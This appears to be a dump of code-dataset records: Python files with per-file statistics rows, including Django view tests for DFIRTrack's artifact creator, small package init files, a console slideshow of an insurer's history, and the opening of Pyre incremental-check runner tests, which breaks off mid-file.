system_created_by_user_id=test_user,
system_modified_by_user_id=test_user,
)
def test_artifact_creator_not_logged_in(self):
"""test creator view"""
# create url
destination = '/login/?next=' + urllib.parse.quote(
'/artifacts/artifact/creator/', safe=''
)
# get response
response = self.client.get('/artifacts/artifact/creator/', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=302, target_status_code=200
)
def test_artifact_creator_logged_in(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get response
response = self.client.get('/artifacts/artifact/creator/')
# compare
self.assertEqual(response.status_code, 200)
def test_artifact_creator_template(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get response
response = self.client.get('/artifacts/artifact/creator/')
# compare
self.assertTemplateUsed(
response, 'dfirtrack_artifacts/artifact/artifact_creator.html'
)
def test_artifact_creator_get_user_context(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get response
response = self.client.get('/artifacts/artifact/creator/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_artifact_creator')
def test_artifact_creator_redirect(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# create url
destination = urllib.parse.quote('/artifacts/artifact/creator/', safe='/')
# get response
response = self.client.get('/artifacts/artifact/creator', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
def test_artifact_creator_post_redirect(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get objects
artifactpriority_1 = Artifactpriority.objects.get(
artifactpriority_name='artifactpriority_1'
)
artifactstatus_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_1'
)
artifacttype_1 = Artifacttype.objects.get(
artifacttype_name='artifact_creator_artifacttype_1'
)
system_1 = System.objects.get(system_name='artifact_creator_system_1')
# create post data
data_dict = {
'artifactpriority': artifactpriority_1.artifactpriority_id,
'artifactstatus': artifactstatus_1.artifactstatus_id,
'artifacttype': [
artifacttype_1.artifacttype_id,
],
'system': [
system_1.system_id,
],
}
# create url
destination = '/artifacts/artifact/'
# get response
response = self.client.post('/artifacts/artifact/creator/', data_dict)
# compare
self.assertRedirects(
response, destination, status_code=302, target_status_code=200
)
def test_artifact_creator_post_system_and_artifacts(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get objects
artifactpriority_1 = Artifactpriority.objects.get(
artifactpriority_name='artifactpriority_1'
)
artifactstatus_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_1'
)
artifacttype_1 = Artifacttype.objects.get(
artifacttype_name='artifact_creator_artifacttype_1'
)
artifacttype_2 = Artifacttype.objects.get(
artifacttype_name='artifact_creator_artifacttype_2'
)
artifacttype_3 = Artifacttype.objects.get(
artifacttype_name='artifact_creator_artifacttype_3'
)
system_1 = System.objects.get(system_name='artifact_creator_system_1')
system_2 = System.objects.get(system_name='artifact_creator_system_2')
system_3 = System.objects.get(system_name='artifact_creator_system_3')
# create post data
data_dict = {
'artifactpriority': artifactpriority_1.artifactpriority_id,
'artifactstatus': artifactstatus_1.artifactstatus_id,
'artifacttype': [
artifacttype_1.artifacttype_id,
artifacttype_2.artifacttype_id,
],
'system': [
system_1.system_id,
system_2.system_id,
],
}
# get response
self.client.post('/artifacts/artifact/creator/', data_dict)
# compare
self.assertTrue(
system_1.artifact_system.filter(artifacttype=artifacttype_1).exists()
)
self.assertTrue(
system_1.artifact_system.filter(artifacttype=artifacttype_2).exists()
)
self.assertFalse(
system_1.artifact_system.filter(artifacttype=artifacttype_3).exists()
)
self.assertTrue(
system_2.artifact_system.filter(artifacttype=artifacttype_1).exists()
)
self.assertTrue(
system_2.artifact_system.filter(artifacttype=artifacttype_2).exists()
)
self.assertFalse(
system_2.artifact_system.filter(artifacttype=artifacttype_3).exists()
)
self.assertFalse(
system_3.artifact_system.filter(artifacttype=artifacttype_1).exists()
)
self.assertFalse(
system_3.artifact_system.filter(artifacttype=artifacttype_2).exists()
)
self.assertFalse(
system_3.artifact_system.filter(artifacttype=artifacttype_3).exists()
)
def test_artifact_creator_post_invalid_reload(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# create post data
data_dict = {}
# get response
response = self.client.post('/artifacts/artifact/creator/', data_dict)
# compare
self.assertEqual(response.status_code, 200)
def test_artifact_creator_post_invalid_template(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# create post data
data_dict = {}
# get response
response = self.client.post('/artifacts/artifact/creator/', data_dict)
# compare
self.assertTemplateUsed(
response, 'dfirtrack_artifacts/artifact/artifact_creator.html'
)
def test_artifact_creator_post_messages(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get objects
artifactpriority_1 = Artifactpriority.objects.get(
artifactpriority_name='artifactpriority_1'
)
artifactstatus_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_1'
)
artifacttype_1 = Artifacttype.objects.get(
artifacttype_name='artifact_creator_artifacttype_1'
)
artifacttype_2 = Artifacttype.objects.get(
artifacttype_name='artifact_creator_artifacttype_2'
)
artifacttype_3 = Artifacttype.objects.get(
artifacttype_name='artifact_creator_artifacttype_3'
)
system_1 = System.objects.get(system_name='artifact_creator_system_1')
system_2 = System.objects.get(system_name='artifact_creator_system_2')
system_3 = System.objects.get(system_name='artifact_creator_system_3')
# create post data
data_dict = {
'artifactpriority': artifactpriority_1.artifactpriority_id,
'artifactstatus': artifactstatus_1.artifactstatus_id,
'artifacttype': [
artifacttype_1.artifacttype_id,
artifacttype_2.artifacttype_id,
artifacttype_3.artifacttype_id,
],
'system': [
system_1.system_id,
system_2.system_id,
system_3.system_id,
],
}
# get response
response = self.client.post('/artifacts/artifact/creator/', data_dict)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(messages[0]), 'Artifact creator started')
self.assertEqual(str(messages[1]), '9 artifacts created for 3 systems.')
def test_artifact_creator_post_artifacttype_name(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get objects
artifactpriority_1 = Artifactpriority.objects.get(
artifactpriority_name='artifactpriority_1'
)
artifactstatus_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_1'
)
system_1 = System.objects.get(system_name='artifact_creator_system_1')
# create objects
artifacttype_1 = Artifacttype.objects.create(
artifacttype_name='artifact_name_1'
)
artifacttype_2 = Artifacttype.objects.create(
artifacttype_name='artifact_name_2'
)
# create post data
data_dict = {
'artifactpriority': artifactpriority_1.artifactpriority_id,
'artifactstatus': artifactstatus_1.artifactstatus_id,
'artifacttype': [
artifacttype_1.artifacttype_id,
artifacttype_2.artifacttype_id,
],
'system': [
system_1.system_id,
],
}
# get response
self.client.post('/artifacts/artifact/creator/', data_dict)
# compare
self.assertTrue(
Artifact.objects.filter(artifact_name='artifact_name_1').exists()
)
self.assertTrue(
Artifact.objects.filter(artifact_name='artifact_name_2').exists()
)
def test_artifact_creator_post_alternative_name(self):
"""test creator view"""
# login testuser
self.client.login(
username='testuser_artifact_creator', password='bHLMxCuEAUOv6WSwu26X'
)
# get objects
artifactpriority_1 = Artifactpriority.objects.get(
artifactpriority_name='artifactpriority_1'
)
artifactstatus_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_1'
)
system_1 = System.objects.get(system_name='artifact_creator_system_1')
# create objects
artifacttype_1 = Artifacttype.objects.create(
artifacttype_name='artifact_name_3'
)
artifacttype_2 = Artifacttype.objects.create(
artifacttype_name='artifact_name_4'
)
# create post data
data_dict = {
'artifactpriority': artifactpriority_1.artifactpriority_id,
'artifactstatus': artifactstatus_1.artifactstatus_id,
'artifacttype': [
artifacttype_1.artifacttype_id,
artifacttype_2.artifacttype_id,
],
'system': [
system_1.system_id,
],
'alternative_artifact_name_choice': True,
'alternative_artifact_name': 'artifact_name_5',
}
# get response
self.client.post('/artifacts/artifact/creator/', data_dict)
# compare
self.assertTrue(
Artifact.objects.filter(artifact_name='artifact_name_5').exists()
)
self.assertEqual(
Artifact.objects.filter(artifact_name='artifact_name_5').count(), 2
)
| 36.206468 | 88 | 0.633528 | 1,350 | 14,555 | 6.528148 | 0.072593 | 0.110632 | 0.04743 | 0.04221 | 0.875979 | 0.863838 | 0.851242 | 0.840463 | 0.795302 | 0.767162 | 0 | 0.018038 | 0.28011 | 14,555 | 401 | 89 | 36.296758 | 0.823058 | 0.067812 | 0 | 0.565657 | 0 | 0 | 0.179398 | 0.110301 | 0 | 0 | 0 | 0 | 0.077441 | 1 | 0.043771 | false | 0.040404 | 0.020202 | 0 | 0.06734 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
18a2e5564311ce12c96f2662d379dfda59517835 | 82 | py | Python | hydrogels/theory/models/__init__.py | debeshmandal/brownian | bc5b2e00a04d11319c85e749f9c056b75b450ff7 | [
"MIT"
] | 3 | 2020-05-13T01:07:30.000Z | 2021-02-12T13:37:23.000Z | hydrogels/theory/models/__init__.py | debeshmandal/brownian | bc5b2e00a04d11319c85e749f9c056b75b450ff7 | [
"MIT"
] | 24 | 2020-06-04T13:48:57.000Z | 2021-12-31T18:46:52.000Z | hydrogels/theory/models/__init__.py | debeshmandal/brownian | bc5b2e00a04d11319c85e749f9c056b75b450ff7 | [
"MIT"
] | 1 | 2020-07-23T17:15:23.000Z | 2020-07-23T17:15:23.000Z | import hydrogels.potentials as potentials
import hydrogels.functions as functions
| 27.333333 | 41 | 0.878049 | 10 | 82 | 7.2 | 0.5 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 82 | 2 | 42 | 41 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
18a5de61395fd5bd81822139a3f9cae953ec0ed8 | 84 | py | Python | uniflex/uniflex/msgs/__init__.py | danieldUKIM/uniflex_wishrem | 44ca1cfaafc33a83e856dbf9eaf9c1b83d0a477b | [
"Apache-2.0"
] | 2 | 2017-04-19T07:32:03.000Z | 2017-06-28T10:31:08.000Z | uniflex/uniflex/msgs/__init__.py | danieldUKIM/uniflex_wishrem | 44ca1cfaafc33a83e856dbf9eaf9c1b83d0a477b | [
"Apache-2.0"
] | 1 | 2018-03-28T06:54:48.000Z | 2018-03-28T06:54:48.000Z | uniflex/uniflex/msgs/__init__.py | danieldUKIM/uniflex_wishrem | 44ca1cfaafc33a83e856dbf9eaf9c1b83d0a477b | [
"Apache-2.0"
] | 2 | 2017-02-03T11:11:22.000Z | 2021-09-18T07:04:22.000Z | from .messages_pb2 import *
from .msg_helper import *
from .msgdescription import *
| 21 | 29 | 0.785714 | 11 | 84 | 5.818182 | 0.636364 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013889 | 0.142857 | 84 | 3 | 30 | 28 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
18af18b688f865a8fdf5ed52ba8d6b93c781a267 | 268 | py | Python | program_top/components/standalone_working_class/working_type_base/backend_interface_base/elasticsearch_interface_base/hotel_info_search_interface.py | xunquant/fish_quant_trader | 40ecb81d1e51b80ccbff89753ff9e0ca8329d20c | [
"MIT"
] | 7 | 2016-11-05T22:27:00.000Z | 2020-01-09T15:57:16.000Z | program_top/components/standalone_working_class/working_type_base/backend_interface_base/elasticsearch_interface_base/hotel_info_search_interface.py | xunquant/fish_quant_trader | 40ecb81d1e51b80ccbff89753ff9e0ca8329d20c | [
"MIT"
] | 1 | 2016-08-18T14:00:25.000Z | 2016-08-18T14:00:25.000Z | program_top/components/standalone_working_class/working_type_base/backend_interface_base/elasticsearch_interface_base/hotel_info_search_interface.py | xunquant/fish_quant_trader | 40ecb81d1e51b80ccbff89753ff9e0ca8329d20c | [
"MIT"
] | 5 | 2016-08-19T04:31:25.000Z | 2018-08-16T15:35:07.000Z | # encoding: UTF-8
from program_top.components.standalone_working_class.working_type_base.backend_interface_base.elasticsearch_interface_base import elastic_interface_base
class hotel_info_search_interface(elastic_interface_base):
'''
酒店信息查询接口,继承自通用接口
'''
pass | 22.333333 | 152 | 0.854478 | 34 | 268 | 6.264706 | 0.676471 | 0.244131 | 0.187793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004049 | 0.078358 | 268 | 12 | 153 | 22.333333 | 0.8583 | 0.123134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
7a131beeb49daa5dc2d8d0ff8568e79dc1589694 | 5,467 | py | Python | milvik.py | Anilkutsa/milvik_art | 10e8d433b37223df703411ed12401c6b309c9d39 | [
"MIT"
] | null | null | null | milvik.py | Anilkutsa/milvik_art | 10e8d433b37223df703411ed12401c6b309c9d39 | [
"MIT"
] | null | null | null | milvik.py | Anilkutsa/milvik_art | 10e8d433b37223df703411ed12401c6b309c9d39 | [
"MIT"
] | null | null | null | from art import *
import emoji
import time
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("Hello World...")
print("")
time.sleep(3.0)
print("How are you ?")
print("")
time.sleep(3.0)
print("Let me tell you brief history of MILVIK BIMA")
print("")
time.sleep(3.0)
print("in Star Trek Style...!!")
print(emoji.emojize(":winking_face_with_tongue:"))
print("")
time.sleep(3.0)
print("Ready ??")
print("")
time.sleep(5.0)
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
tprint("2010",font="block",chr_ignore=True)
tprint("The Story Begins",font="cybermedum")
print("BIMA launches in Ghana. In partnership with Tigo we bring Family Care Insurance to customers.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2011",font="block",chr_ignore=True)
tprint("Second Market",font="cybermedum")
print("BIMA launches its second product with Tigo in Ghana and starts operations in its second market: Tanzania.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2012",font="block",chr_ignore=True)
tprint("First step into Asia.",font="cybermedum")
print("Kinnevik and Millicom invest in BIMA and we launch 2 new markets: Senegal and Bangladesh.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2013",font="block",chr_ignore=True)
tprint("We expand Product offer",font="cybermedum")
print("We launch our very first Hospital insurance product. Leapfrog Investments commits funding to BIMA as we expand to our 6th market!")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2014",font="block",chr_ignore=True)
tprint("Million mark",font="cybermedum")
print("Not only is it our most prolific year for market launches, with 7 new countries going live, we also hit milestone of one million policies sold.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2015",font="block",chr_ignore=True)
tprint("Beyond insurance",font="cybermedum")
print("BIMA launches mHealth services. We now give people access to vital health services at the touch of a button. We go live in Pakistan.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2016",font="block",chr_ignore=True)
tprint("All about empowerment",font="cybermedum")
print("We launch RUN, BIMAs womens empowerment programme to promote gender equality across our markets.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2017",font="block",chr_ignore=True)
tprint("Hundred million investment",font="cybermedum")
print("Axiata and Allianz X invest $16.8 million and $96.2 million for the continued expansion of BIMA.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2018",font="block",chr_ignore=True)
tprint("m-Health Evolution",font="cybermedum")
print("BIMA introduces exciting new features to its mHealth offer, including discounts at laboratories, home medicine delivery and a customer app in two markets Ghana and Bangladesh. We also launch BIMA in Malaysia.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2019",font="block",chr_ignore=True)
tprint("Winning Mobile Oscars",font="cybermedum")
print("BIMA wins Best Innovation for Health and Biotech at the GSMA GLOMO awards, considered the Oscars of the mobile industry.")
print("")
print("")
print("")
print("")
print("")
time.sleep(8.0)
print("")
print("")
print("")
print("")
print("")
tprint("2020",font="block",chr_ignore=True)
tprint("Importance during Pandemic",font="cybermedum")
print("Pandemic made people realize the importance of BIMA even more. Insurance and health service should never be luxury but rather a necessary that each and everyone can afford. And we at BIMA promise in delivering that !!")
print("")
print("")
print("")
print("")
print("")
time.sleep(14.0)
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("Like what you see ?")
print("")
print("Download the complete source code for this project from below link - ")
print("https://github.com/Anilkutsa/milvik_art.git")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
time.sleep(5.0)
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("Thanks for sitting through these interesting or rather awkward slideshow !!")
print(emoji.emojize(":grinning_face_with_big_eyes:"))
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
time.sleep(3.0)
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("You deserve a pat on a back. Enjoy this cool animation that will cheer you up !!")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
time.sleep(3.0)
| 20.630189 | 226 | 0.671118 | 763 | 5,467 | 4.783748 | 0.314548 | 0.457534 | 0.563014 | 0.591781 | 0.479178 | 0.438904 | 0.329863 | 0.320548 | 0.320548 | 0.320548 | 0 | 0.018806 | 0.105177 | 5,467 | 264 | 227 | 20.708333 | 0.72731 | 0 | 0 | 0.814394 | 0 | 0.026515 | 0.419426 | 0.01006 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.018939 | 0 | 0.018939 | 0.916667 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
e168cb99acd35d11cc79793b650172876407b827 | 29,387 | py | Python | tools/incremental_test/tests/runner_tests.py | joehendrix/pyre-check | 23693455b1e0b4a7287efba9337be6bbfe23ada4 | [
"MIT"
] | 1 | 2022-02-10T10:51:32.000Z | 2022-02-10T10:51:32.000Z | tools/incremental_test/tests/runner_tests.py | joehendrix/pyre-check | 23693455b1e0b4a7287efba9337be6bbfe23ada4 | [
"MIT"
] | null | null | null | tools/incremental_test/tests/runner_tests.py | joehendrix/pyre-check | 23693455b1e0b4a7287efba9337be6bbfe23ada4 | [
"MIT"
] | null | null | null | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import unittest
from dataclasses import asdict
from pathlib import Path
from typing import List, Optional
from unittest.mock import MagicMock, patch
from ..runner import (
InconsistentOutput,
PyreError,
ResultComparison,
compare_server_to_full,
)
from ..specification import Specification
from .test_environment import (
CommandInput,
CommandOutput,
MockExecuteCallable,
TestEnvironment,
)
def mock_stat(_path: str) -> MagicMock:
stat = MagicMock()
stat.st_size = 4002
return stat
mock_temp_file_class: MagicMock = MagicMock()
mock_temp_file_context_manager: MagicMock = mock_temp_file_class.return_value.__enter__
mock_temp_file_context_manager.return_value.name = "tempfile"
class RunnerTest(unittest.TestCase):
@patch("os.stat", new=mock_stat)
@patch("tempfile.NamedTemporaryFile", new=mock_temp_file_class)
def assert_run(
self,
mock_execute: MockExecuteCallable,
specification: Specification,
expected_commands: List[CommandInput],
expected_discrepancy: Optional[InconsistentOutput],
pyre_binary_override: Optional[str] = None,
typeshed_override: Optional[str] = None,
pyre_client_override: Optional[str] = None,
) -> ResultComparison:
self.maxDiff = None
environment = TestEnvironment(mock_execute)
environment.pyre_binary_override = pyre_binary_override
environment.typeshed_override = typeshed_override
environment.pyre_client_override = pyre_client_override
actual_result = compare_server_to_full(environment, specification)
self.assertEqual(actual_result.discrepancy, expected_discrepancy)
actual_commands = environment.command_history
self.assertEqual(actual_commands, expected_commands)
return actual_result
def test_basic(self) -> None:
specification = Specification.from_json(
{
"old_state": {
"kind": "hg",
"repository": "old_root",
"commit_hash": "old_hash",
},
"new_state": {"kind": "hg", "commit_hash": "new_hash"},
"pyre_check_pyre_options": "--option1",
"pyre_start_pyre_options": "--option2",
"pyre_incremental_pyre_options": "--option3",
"pyre_stop_pyre_options": "--option4",
"pyre_stop_options": "--option5",
}
)
initial_hash: str = "initial_hash"
expected_commands = [
CommandInput(Path("old_root"), "hg whereami"),
CommandInput(Path("old_root"), "hg update --clean old_hash"),
CommandInput(
Path("old_root"),
"pyre --option2 --no-saved-state --enable-profiling restart",
),
CommandInput(
Path("old_root"), "pyre profile --profile-output=cold_start_phases"
),
CommandInput(
Path("old_root"),
"pyre profile --profile-output=total_shared_memory_size_over_time",
),
CommandInput(Path("old_root"), "pyre query save_server_state('tempfile')"),
CommandInput(Path("old_root"), "hg update --clean new_hash"),
CommandInput(
Path("old_root"), "pyre profile --profile-output=incremental_updates"
),
CommandInput(
Path("old_root"),
"pyre --option3 --output=json --noninteractive incremental",
),
CommandInput(Path("old_root"), "pyre --option4 stop --option5"),
CommandInput(
Path("old_root"), "pyre --option1 --output=json --noninteractive check"
),
CommandInput(Path("old_root"), f"hg update --clean {initial_hash}"),
]
def always_clean_execute(command_input: CommandInput) -> CommandOutput:
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
else:
return CommandOutput(return_code=0, stdout="", stderr="")
comparison = self.assert_run(
mock_execute=always_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
)
cold_start_logs = comparison.profile_logs.cold_start_log
self.assertEqual(cold_start_logs["heap_size"], 42)
self.assertEqual(cold_start_logs["saved_state_size"], 4002)
def consistent_not_clean_execute(command_input: CommandInput) -> CommandOutput:
pyre_error = PyreError(
line=1, column=1, path="test.py", description="Something is wrong"
)
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
elif command_input.command.endswith(
"check"
) or command_input.command.endswith("incremental"):
return CommandOutput(
return_code=1, stdout=json.dumps([asdict(pyre_error)]), stderr=""
)
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=consistent_not_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
)
def inconsistent_execute0(command_input: CommandInput) -> CommandOutput:
pyre_error = PyreError(
line=1, column=1, path="test.py", description="Something is wrong"
)
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
elif command_input.command.endswith("check"):
return CommandOutput(
return_code=1, stdout=json.dumps([asdict(pyre_error)]), stderr=""
)
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=inconsistent_execute0,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=InconsistentOutput(
full_check_output=[
PyreError(
line=1,
column=1,
path="test.py",
description="Something is wrong",
)
],
incremental_check_output=[],
),
)
def inconsistent_execute1(command_input: CommandInput) -> CommandOutput:
pyre_error0 = PyreError(
line=1, column=1, path="test.py", description="Something is wrong"
)
pyre_error1 = PyreError(
line=2, column=2, path="test2.py", description="Something else is wrong"
)
pyre_error2 = PyreError(
line=3, column=3, path="test3.py", description="Everything's broken!"
)
if command_input.command.startswith("hg whereami"):
return CommandOutput(return_code=0, stdout=initial_hash, stderr="")
elif "total_shared_memory_size_over_time" in command_input.command:
return CommandOutput(return_code=0, stdout='[["time", 42]]', stderr="")
elif "cold_start_phases" in command_input.command:
return CommandOutput(return_code=0, stdout="{}", stderr="")
elif " profile" in command_input.command:
return CommandOutput(return_code=0, stdout="[{}, {}, {}]", stderr="")
elif command_input.command.endswith("check"):
return CommandOutput(
return_code=1, stdout=json.dumps([asdict(pyre_error0)]), stderr=""
)
elif command_input.command.endswith("incremental"):
return CommandOutput(
return_code=1,
stdout=json.dumps([asdict(pyre_error1), asdict(pyre_error2)]),
stderr="",
)
else:
return CommandOutput(return_code=0, stdout="", stderr="")
self.assert_run(
mock_execute=inconsistent_execute1,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=InconsistentOutput(
full_check_output=[
PyreError(
line=1,
column=1,
path="test.py",
description="Something is wrong",
)
],
incremental_check_output=[
PyreError(
line=2,
column=2,
path="test2.py",
description="Something else is wrong",
),
PyreError(
line=3,
column=3,
path="test3.py",
description="Everything's broken!",
),
],
),
)
expected_commands = [
CommandInput(Path("old_root"), "hg whereami"),
CommandInput(Path("old_root"), "hg update --clean old_hash"),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed --option2 "
"--no-saved-state --enable-profiling restart",
),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed profile "
"--profile-output=cold_start_phases",
),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed profile "
"--profile-output=total_shared_memory_size_over_time",
),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed query "
"save_server_state('tempfile')",
),
CommandInput(Path("old_root"), "hg update --clean new_hash"),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed profile "
"--profile-output=incremental_updates",
),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed --option3 "
"--output=json --noninteractive incremental",
),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed --option4 stop --option5",
),
CommandInput(
Path("old_root"),
"client --binary bin --typeshed bikeshed --option1 "
"--output=json --noninteractive check",
),
CommandInput(Path("old_root"), f"hg update --clean {initial_hash}"),
]
self.assert_run(
mock_execute=always_clean_execute,
specification=specification,
expected_commands=expected_commands,
expected_discrepancy=None,
pyre_binary_override="bin",
typeshed_override="bikeshed",
pyre_client_override="client",
)
def test_patch(self) -> None:
patch_content = (
"diff --git a/client/pyre.py b/client/pyre.py\n"
"--- a/client/pyre.py\n"
"+++ b/client/pyre.py\n"
"@@ -33,6 +33,8 @@\n"
" from .analysis_directory import AnalysisDirectory\n"
" from .version import __version__\n"
"+FOO: int = 42\n"
"+\n"
" LOG = logging.getLogger(__name__) # type: logging.Logger\n"
)
specification = Specification.from_json(
{
"old_state": {
"kind": "hg",
"repository": "old_root",
"commit_hash": "old_hash",
},
"new_state": {
"kind": "patch",
"patch": patch_content,
"patch_flags": "-p1",
},
}
)
initial_hash: str = "initial_hash"
expected_commands = [
CommandInput(Path("old_root"), "hg whereami"),
CommandInput(Path("old_root"), "hg update --clean old_hash"),
CommandInput(
Path("old_root"), "pyre --no-saved-state --enable-profiling restart"
),
CommandInput(
Path("old_root"), "pyre profile --profile-output=cold_start_phases"
),
CommandInput(
Path("old_root"),
